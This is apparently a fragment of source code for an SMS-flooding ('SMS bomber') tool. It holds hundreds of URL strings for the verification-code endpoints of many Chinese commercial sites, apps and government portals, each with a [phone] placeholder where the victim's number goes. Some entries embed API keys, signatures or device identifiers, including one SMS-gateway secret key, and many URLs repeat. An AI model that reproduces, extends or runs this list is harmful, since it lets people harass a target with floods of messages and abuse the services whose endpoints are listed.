"http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", + "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]&ccode=&id=PUT60101350&sid=72a49eb9c9b94b2692a44daa50e2011c&cid=72a49eb9c9b94b2692a44daa50e2011c&lng=cn&p=http%3A//www.lxcpa.net/&e=&un=&ud=&on=&d=1589617104719", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://user.daojia.com/mobile/getcode?mobile=[phone]", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.zuisgo.com/index.php?s=/api/mobile_verify_code_get_request/index2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", + "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", + "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + "http://121.36.193.131/api/v3.1/thirdpartyapi/aliyunmessageapi/SendVerifyMessage?phoneNumber=86[phone]&type=1", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", + "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]&type=0&token=&imei=&nwt=1&q=27&sc=", + "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", + "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", + "http://www.maimaishichang.com/m/reg/motregchk.php?mob=[phone]", + "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", + "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://passport.58.com/mobileauthcodelogin/getcode?validatecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", + "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery183041957833420943325_1584502778631&mobile=[phone]&_=1584502793693", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://m.huibo.com/register/getAuthCode?txtPhone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", + "http://www.udache.com/app/mQuickReg/getSmsCode?phone=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1575815921608", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", + "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=您的手机验证码为:3973+,该验证码10%", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", + "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.287588&imei=F3F6BCC9-", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://www.771ka.com/register/checkinfo?clientid=newmobile&newmobile=[phone]&_=1589617672457", + "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", + "https://logic-zone-10007.api.xlgxapp.com/315000/rider/api/v3/message/[phone]?event=OneKeyLogin", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", + "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", + "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", + "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", + "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00:19:14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone 6s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", + "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.709088000.top/api.php?act=user&key=5E3DSmoFEEvDEJWpiz&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", + "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", + "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://m.mgqr.com/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", + "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://koudaitong.com/v2/common/sms/captcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&verifyTimes=1&biz=kdt_account_captcha&_=1430461129949&mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", + "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", + "http://reg.suning.com/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + 